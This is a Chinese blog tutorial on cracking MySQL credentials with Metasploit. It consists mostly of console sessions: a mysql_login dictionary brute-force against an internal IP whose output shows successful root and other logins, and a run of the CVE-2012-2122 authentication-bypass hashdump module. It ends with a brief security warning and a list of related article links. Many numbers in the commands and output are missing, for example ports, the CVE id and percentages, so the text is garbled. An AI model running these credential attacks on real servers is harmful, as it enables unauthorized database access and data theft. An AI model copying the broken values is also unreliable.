下面这个方式是普适的,但缺点就是必须要有自己的用户名和密码字典。其原理就是用user.txt与pass.txt的两个文本去不停交叉验证。

msf auxiliary(mysql_login) > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > show options 

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description

   ----              ---------------  --------  -----------

   BLANK_PASSWORDS   false            no        Try blank passwords for all users

   BRUTEFORCE_SPEED                  yes       How fast to bruteforce, from  to

   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database

   DB_ALL_PASS       false            no        Add all passwords in the current database to the list

   DB_ALL_USERS      false            no        Add all users in the current database to the list

   PASSWORD                           no        A specific password to authenticate with

   PASS_FILE                          no        File containing passwords, one per line

   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]

   RHOSTS                       yes       The target address range or CIDR identifier

   RPORT                              yes       The target port

   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host

   THREADS                           yes       The number of concurrent threads

   USERNAME                           no        A specific username to authenticate as

   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line

   USER_AS_PASS      false            no        Try the username as the password for all users

   USER_FILE                          no        File containing usernames, one per line

   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(mysql_login) > set RHOSTS 10.199.169.160

RHOSTS => 10.199.169.160

msf auxiliary(mysql_login) > set RPORT 3307

RPORT =>

msf auxiliary(mysql_login) > set USER_FILE /home/user.txt

USER_FILE => /home/user.txt

msf auxiliary(mysql_login) > set PASS_FILE /home/pass.txt

PASS_FILE => /home/pass.txt

msf auxiliary(mysql_login) >

msf auxiliary(mysql_login) > exploit 

[*] 10.199.169.160: MYSQL - Found remote MySQL version 5.5.

[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:root (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))

[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:vipshop (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))

[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:vipshop!@# (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))

[-] 10.199.169.160: MYSQL - LOGIN FAILED: tms:cdtms (Incorrect: Access denied for user 'tms'@'192.168.132.113' (using password: YES))

[-] 10.199.169.160: MYSQL - LOGIN FAILED: root:root (Incorrect: Access denied for user 'root'@'192.168.132.113' (using password: YES))

[+] 10.199.169.160: MYSQL - Success: 'root:vi****p'

[-] 10.199.169.160: MYSQL - LOGIN FAILED: cdtms:root (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))

[-] 10.199.169.160: MYSQL - LOGIN FAILED: cdtms:vipshop (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))

[-] 10.199.169.160: MYSQL - LOGIN FAILED: cdtms:vipshop!@# (Incorrect: Access denied for user 'cdtms'@'192.168.132.113' (using password: YES))

[+] 10.199.169.160: MYSQL - Success: 'cdt**s:cdt**s'

[*] Scanned  of  hosts (% complete)

[*] Auxiliary module execution completed

另外,针对某些特定的Mysql版本,也可以采取一些特定的手段,比如Mysql的漏洞:CVE-2012-2122

假设我们得到了一个Mysql为5.1.61, 5.2.11, 5.3.5, 5.5.22的数据库(下面这个只是操作过程,数据库版本不是含漏洞版本)

msf > use auxiliary/scanner/mysql/mysql_version

msf auxiliary(mysql_version) > show options 

Module options (auxiliary/scanner/mysql/mysql_version):

   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOSTS                    yes       The target address range or CIDR identifier

   RPORT                 yes       The target port

   THREADS                  yes       The number of concurrent threads

msf auxiliary(mysql_version) > set RHOSTS 10.199.128.61

RHOSTS => 10.199.128.61

msf auxiliary(mysql_version) > set THREADS

THREADS =>

msf auxiliary(mysql_version) > exploit 

[*] 10.199.128.61: is running MySQL 5.5.-log (protocol )

[*] Scanned  of  hosts (% complete)

[*] Auxiliary module execution completed

第一步就是获取mysql version。第二步便配置Mysql的IP和端口就可以exploit了(事实上有IP足够了,所有端口开放的服务都能扫描得到)

msf auxiliary(mysql_hashdump) > search CVE--

Matching Modules

================

   Name                                               Disclosure Date  Rank    Description

   ----                                               ---------------  ----    -----------

   auxiliary/scanner/mysql/mysql_authbypass_hashdump  --       normal  MySQL Authentication Bypass Password Dump

msf auxiliary(mysql_hashdump) > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf auxiliary(mysql_authbypass_hashdump) >

msf auxiliary(mysql_authbypass_hashdump) >

msf auxiliary(mysql_authbypass_hashdump) > show options 

Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):

   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   RHOSTS                     yes       The target address range or CIDR identifier

   RPORT                  yes       The target port

   THREADS                   yes       The number of concurrent threads

   USERNAME  root             yes       The username to authenticate as

msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 10.199.128.61

RHOSTS => 10.199.128.61

msf auxiliary(mysql_authbypass_hashdump) > exploit 

[+] 10.199.128.61: The server allows logins, proceeding with bypass test

[*] 10.199.128.61: Authentication bypass is % complete

[*] 10.199.128.61: Authentication bypass is % complete

[*] 10.199.128.61: Authentication bypass is % complete

[*] 10.199.128.61: Authentication bypass is % complete

[*] 10.199.128.61: Authentication bypass is % complete

[*] 10.199.128.61: Authentication bypass is % complete

[*] 10.199.128.61: Authentication bypass is % complete

[*] 10.199.128.61: Authentication bypass is % complete

[*] 10.199.128.61: Authentication bypass is % complete

[*] 10.199.128.61: Authentication bypass is % complete

[-] 10.199.128.61: Unable to bypass authentication, this target may not be vulnerable

[*] Scanned  of  hosts (% complete)

[*] Auxiliary module execution completed

然后这样就这么简单,你会得到一个用户名和密码。

-------------------

想想看,假设你的数据库有漏洞,别人有你一个公网IP,就能获取你的数据库信息。。。所以,网上公布重大漏洞时,不要置身事外。

用Metasploit破解Mysql用户名和密码的更多相关文章

  1. 如何修改mysql用户名和密码

    如何修改mysql用户名和密码   以修改mysql的root密码为例修改的三种方法 方法1: 用SET PASSWORD命令 mysql>SET PASSWORD FOR 'root'@'lo ...

  2. 安装WAMP 及 修改MYSQL用户名 、 密码

    1,下载并安装WAMP 2,启动服务后,找到MYSQL--MYSQL console--弹出命令窗口(刚开始没有初始用户名跟密码,可直接回车执行) 3,首先输入 use mysq;l---然后修改用户 ...

  3. python 编写暴力破解mysql用户名密码

    本文摘自别人的,自己运行调试了一下#!/user/bin/env python#-*- coding:utf-8 -*- import pymysql#导入连接数据库的模块import sys cla ...

  4. MySQL用户名和密码问题

    MySQL使用脚本的方法: source d:\datafilename.sql # mysql -uroot -p Enter password: ERROR 1045 (28000): Acces ...

  5. windows下修改mysql用户名和密码

    1.关闭正在运行的MySQL. 2.打开DOS窗口,转到mysql\bin目录. 3.输入mysqld-nt --skip-grant-tables回车.如果没有出现提示信息,那就对了. 4.再开一个 ...

  6. 破解mysql数据库的密码

    发现的1小问题 语句打错以后应该退出本语句,再继续打新语句.也可以打\c,退出本语句. 如何破解数据库的密码: 1:通过任务管理器或者服务管理,关掉mysqld(服务进程) 2:通过命令行+特殊参数开 ...

  7. 修改linux的mysql用户名和密码

    MySQL数据库密码忘记之后,可以进入linux下修改原始密码,步骤为下.第一步:登陆服务器管理员权限.第二步:进入MySQL数据配置文件 [root@VM_0_8_centos ~]# vi /et ...

  8. 快速高效的破解MySQL本地和远程密码

    http://www.kankanews.com/ICkengine/archives/212.shtml 快速的 MySQL 本地和远程密码破解!首先需要对数据库维护人员说明的是,不必紧张,你无需修 ...

  9. [Windows Server 2012] 手工破解MySQL密码

    ★ 欢迎来到[护卫神·V课堂],网站地址:http://v.huweishen.com★ 护卫神·V课堂 是护卫神旗下专业提供服务器教学视频的网站,每周更新视频.★ 本节我们将带领大家:破解MySQL ...

随机推荐

  1. 折腾一天的WordPress

    自从昨天开始要写博客,在网上找了找大家都比较推崇著名的WordPress,所以自己就闲来无事要坐下测试弄一个,不弄不知道,一弄折磨人啊,公司的破网直接想让我崩溃,所以这一天就在这搭建环境中度过,不过值 ...

  2. 微信企业号api调用频率

    主动调用的频率限制 当你获取到AccessToken时,你的应用就可以成功调用企业号后台所提供的各种接口以管理或访问企业号后台的资源或给企业号成员发消息. 为了防止企业应用的程序错误而引发企业号服务器 ...

  3. CYQ.Data 数据框架 使用篇一 入门指南

    快速使用帮助 | 回贴(13) | 浏览(11303) | 发表日期 :2010-12-20 20:12:29   #楼主   本文针对V5版本进行修改于(2016-07-04) 下面是使用步骤: 一 ...

  4. javascript中,对于this指向的浅见

    # this的指向在函数创建的时候确定不了.只有在执行的时候,才可以确定. ## 1 . 这里的this指向window window.fn(); 所以this.user是undefined func ...

  5. Linux使用汇总贴

    1. 服务开机启动 比如: update-rc.d ssh enable 2. 修改hostname [基于ubutun] hostname newname vi /etc/hostnamevi /e ...

  6. Oracle BIEE 环境迁移所导致的账号登陆问题的解决

    系统版本 系统版本:11G(11.1.1.9) 问题描述 将系统数据(RPD.catalog等数据)迁移到另一环境(版本同样为11G)后,老系统weblogic控制台中添加的账户在新系统(仪表盘)中无 ...

  7. 开启Tomcat 源码调试

    开启Tomcat 源码调试 因为工作的原因,需要了解Tomcat整个架构是如何设计的,正如要使用Spring MVC进行Web开发,需要了解Spring是如何设计的一样,有哪些主要的类,分别是用于干什 ...

  8. Oracle11g的安装和基本使用

    一:Oracle11g的安装过程(Windows版本)很简单,步骤为: 1. 首先从Oracle官方网站上下载Oracle11g数据库,大约为1.7G.解压后,setup.ext就可以开始安装  2. ...

  9. [.net程序员必看]微软新动向之Android和IOS应用 visual studio 2015 Cordova[原创]

    自萨蒂亚·纳德拉(Satya Nadella)上任微软CEO以来,可谓是惊喜不断,仿佛让世界尤其是我们.net程序员心中又燃起了希望.先是免费提供 iOS 版和安卓版 Office:然后在 xbox ...

  10. SQL Server 2008 R2——VC++ ADO 操作 存储过程 向datetime类型参数传入空值

    ==================================声明================================== 本文原创,转载在正文中显要的注明作者和出处,并保证文章的完 ...